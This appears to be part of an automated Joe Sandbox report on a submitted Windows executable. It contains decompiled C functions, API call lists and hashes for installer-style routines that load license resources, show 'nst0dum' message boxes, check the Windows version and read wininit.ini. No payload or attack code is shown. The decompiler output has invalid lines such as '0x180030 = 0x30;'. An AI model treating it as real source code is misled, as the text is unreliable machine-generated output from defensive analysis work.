                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3b21
                                                                                                                                                                                                    0x00fd3ae7
                                                                                                                                                                                                    0x00fd3af4
                                                                                                                                                                                                    0x00fd3afc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3afe
                                                                                                                                                                                                    0x00fd3a87
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3a87
                                                                                                                                                                                                    0x00fd3aa8
                                                                                                                                                                                                    0x00fd3ab3
                                                                                                                                                                                                    0x00fd3ab9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3ab9
                                                                                                                                                                                                    0x00fd3a78
                                                                                                                                                                                                    0x00fd3a82
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F64,?,00000002,00000000), ref: 00FD3A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00FD3AB3
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00FD3AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00FD3B13
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FindResourceA.KERNEL32(00FD0000,000007D6,00000005), ref: 00FD652A
                                                                                                                                                                                                      • Part of subcall function 00FD6517: LoadResource.KERNEL32(00FD0000,00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FD6538
                                                                                                                                                                                                      • Part of subcall function 00FD6517: DialogBoxIndirectParamA.USER32(00FD0000,00000000,00000547,00FD19E0,00000000), ref: 00FD6557
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FreeResource.KERNEL32(00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FD6560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00FD3100,00000000,00000000), ref: 00FD3AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: af0fdde4034e686e14ef048b53b505c1c78459b075b5ee29415c77dd18b5403a
                                                                                                                                                                                                    • Instruction ID: 53541a262211e2982caf2f4ac30cd6cd9541633e9f12aade762bc1cb1046cd48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af0fdde4034e686e14ef048b53b505c1c78459b075b5ee29415c77dd18b5403a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD11D635702205BBD720AF76AC09F177BBBEBD6750B18402FB642D63E1DA7D8801B625
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD24E0(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                    				_t7 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					E00FD658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00fd24e0
                                                                                                                                                                                                    0x00fd24eb
                                                                                                                                                                                                    0x00fd24f2
                                                                                                                                                                                                    0x00fd24f7
                                                                                                                                                                                                    0x00fd2504
                                                                                                                                                                                                    0x00fd250e
                                                                                                                                                                                                    0x00fd251d
                                                                                                                                                                                                    0x00fd252c
                                                                                                                                                                                                    0x00fd2541
                                                                                                                                                                                                    0x00fd2546
                                                                                                                                                                                                    0x00fd2553
                                                                                                                                                                                                    0x00fd2555
                                                                                                                                                                                                    0x00fd2555
                                                                                                                                                                                                    0x00fd2546
                                                                                                                                                                                                    0x00fd256c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00FD2506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00FD252C
                                                                                                                                                                                                    • _lopen.KERNEL32(?,00000040), ref: 00FD253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00FD254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00FD2555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 77d3625bdcd33547bc63fb8133dee80de145625d7f59a9bc3448c8c4f6922168
                                                                                                                                                                                                    • Instruction ID: ea69980ee166389cbf04bdfe83f6f4a34a95892a5e538b86c1bdab4fa5b41c6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77d3625bdcd33547bc63fb8133dee80de145625d7f59a9bc3448c8c4f6922168
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801B532A0111867C7209B75DC0CEDF7B7EEB45761F080156FA49D3290DE748E45DAA5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00FD36EE(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				CHAR* _t138;
                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                    				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    				_t115 = __ecx;
                                                                                                                                                                                                    				_t135 = 0;
                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                    					_t119 = 2;
                                                                                                                                                                                                    					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                    					__eflags = _t77;
                                                                                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                                                                                    						_t119 = 0;
                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                    						 *0xfd8184 = 1;
                                                                                                                                                                                                    						 *0xfd8180 = 1;
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						 *0xfd9a40 = _t119;
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						__eflags =  *0xfd8a34 - _t138; // 0x0
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                                    						if(_t115 == 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v428 = _t135;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                    							_v436 = E00FD2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                    							_t91 = E00FD2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                    							_t123 = _v436;
                                                                                                                                                                                                    							_t133 = 0x54d;
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 < 0) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								__eflags = _v420 - 1;
                                                                                                                                                                                                    								if(_v420 == 1) {
                                                                                                                                                                                                    									_t138 = 0x54c;
                                                                                                                                                                                                    									L36:
                                                                                                                                                                                                    									__eflags = _t138;
                                                                                                                                                                                                    									if(_t138 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										__eflags = _t138 - _t133;
                                                                                                                                                                                                    										if(_t138 == _t133) {
                                                                                                                                                                                                    											L30:
                                                                                                                                                                                                    											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                    											_t115 = 0;
                                                                                                                                                                                                    											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                    											__eflags = _t138 - _t133;
                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_t124 = _v440;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0xfd8a38 & 0x00000001;
                                                                                                                                                                                                    											if(( *0xfd8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                    												_push("nst0dum");
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                    												_t94 = E00FD681F(_t115);
                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t98 = E00FD67C9(_t124, _t124);
                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                    									_t104 = E00FD28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0xfd9a40 = _t119;
                                                                                                                                                                                                    						 *0xfd8184 = 1;
                                                                                                                                                                                                    						 *0xfd8180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0xfd9a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0xfd8184 = _t135;
                                                                                                                                                                                                    							 *0xfd8180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E00FD44B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00FD6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x00fd36f9
                                                                                                                                                                                                    0x00fd3700
                                                                                                                                                                                                    0x00fd370c
                                                                                                                                                                                                    0x00fd3716
                                                                                                                                                                                                    0x00fd3718
                                                                                                                                                                                                    0x00fd371b
                                                                                                                                                                                                    0x00fd3721
                                                                                                                                                                                                    0x00fd372b
                                                                                                                                                                                                    0x00fd373d
                                                                                                                                                                                                    0x00fd3745
                                                                                                                                                                                                    0x00fd3746
                                                                                                                                                                                                    0x00fd3746
                                                                                                                                                                                                    0x00fd3749
                                                                                                                                                                                                    0x00fd37ab
                                                                                                                                                                                                    0x00fd37ad
                                                                                                                                                                                                    0x00fd37ae
                                                                                                                                                                                                    0x00fd37b3
                                                                                                                                                                                                    0x00fd37b8
                                                                                                                                                                                                    0x00fd37b8
                                                                                                                                                                                                    0x00fd37bf
                                                                                                                                                                                                    0x00fd37bf
                                                                                                                                                                                                    0x00fd37c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd37cb
                                                                                                                                                                                                    0x00fd37cd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd37d5
                                                                                                                                                                                                    0x00fd37db
                                                                                                                                                                                                    0x00fd37e8
                                                                                                                                                                                                    0x00fd37ea
                                                                                                                                                                                                    0x00fd37ea
                                                                                                                                                                                                    0x00fd37ea
                                                                                                                                                                                                    0x00fd37f0
                                                                                                                                                                                                    0x00fd37f6
                                                                                                                                                                                                    0x00fd3805
                                                                                                                                                                                                    0x00fd3817
                                                                                                                                                                                                    0x00fd382b
                                                                                                                                                                                                    0x00fd3830
                                                                                                                                                                                                    0x00fd3836
                                                                                                                                                                                                    0x00fd383b
                                                                                                                                                                                                    0x00fd383d
                                                                                                                                                                                                    0x00fd38eb
                                                                                                                                                                                                    0x00fd38eb
                                                                                                                                                                                                    0x00fd38f2
                                                                                                                                                                                                    0x00fd390c
                                                                                                                                                                                                    0x00fd3911
                                                                                                                                                                                                    0x00fd3911
                                                                                                                                                                                                    0x00fd3913
                                                                                                                                                                                                    0x00fd394d
                                                                                                                                                                                                    0x00fd394d
                                                                                                                                                                                                    0x00fd394f
                                                                                                                                                                                                    0x00fd38a9
                                                                                                                                                                                                    0x00fd38a9
                                                                                                                                                                                                    0x00fd38b0
                                                                                                                                                                                                    0x00fd38b2
                                                                                                                                                                                                    0x00fd38b9
                                                                                                                                                                                                    0x00fd38bb
                                                                                                                                                                                                    0x00fd38c1
                                                                                                                                                                                                    0x00fd3975
                                                                                                                                                                                                    0x00fd38c7
                                                                                                                                                                                                    0x00fd38de
                                                                                                                                                                                                    0x00fd38e0
                                                                                                                                                                                                    0x00fd38e0
                                                                                                                                                                                                    0x00fd397b
                                                                                                                                                                                                    0x00fd397d
                                                                                                                                                                                                    0x00fd39a9
                                                                                                                                                                                                    0x00fd397f
                                                                                                                                                                                                    0x00fd3982
                                                                                                                                                                                                    0x00fd398b
                                                                                                                                                                                                    0x00fd398d
                                                                                                                                                                                                    0x00fd398f
                                                                                                                                                                                                    0x00fd399f
                                                                                                                                                                                                    0x00fd39a1
                                                                                                                                                                                                    0x00fd3991
                                                                                                                                                                                                    0x00fd3991
                                                                                                                                                                                                    0x00fd3991
                                                                                                                                                                                                    0x00fd398f
                                                                                                                                                                                                    0x00fd39af
                                                                                                                                                                                                    0x00fd39b6
                                                                                                                                                                                                    0x00fd3a0f
                                                                                                                                                                                                    0x00fd3a0f
                                                                                                                                                                                                    0x00fd3a11
                                                                                                                                                                                                    0x00fd3a13
                                                                                                                                                                                                    0x00fd3a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39b8
                                                                                                                                                                                                    0x00fd39b8
                                                                                                                                                                                                    0x00fd39ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39bc
                                                                                                                                                                                                    0x00fd39bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39c3
                                                                                                                                                                                                    0x00fd39c9
                                                                                                                                                                                                    0x00fd39ce
                                                                                                                                                                                                    0x00fd39d0
                                                                                                                                                                                                    0x00fd39e3
                                                                                                                                                                                                    0x00fd39e5
                                                                                                                                                                                                    0x00fd39e6
                                                                                                                                                                                                    0x00fd39f1
                                                                                                                                                                                                    0x00fd39f7
                                                                                                                                                                                                    0x00fd39fa
                                                                                                                                                                                                    0x00fd3a01
                                                                                                                                                                                                    0x00fd3a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3a06
                                                                                                                                                                                                    0x00fd3a09
                                                                                                                                                                                                    0x00fd3a09
                                                                                                                                                                                                    0x00fd3a0b
                                                                                                                                                                                                    0x00fd3a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3a09
                                                                                                                                                                                                    0x00fd39fc
                                                                                                                                                                                                    0x00000000
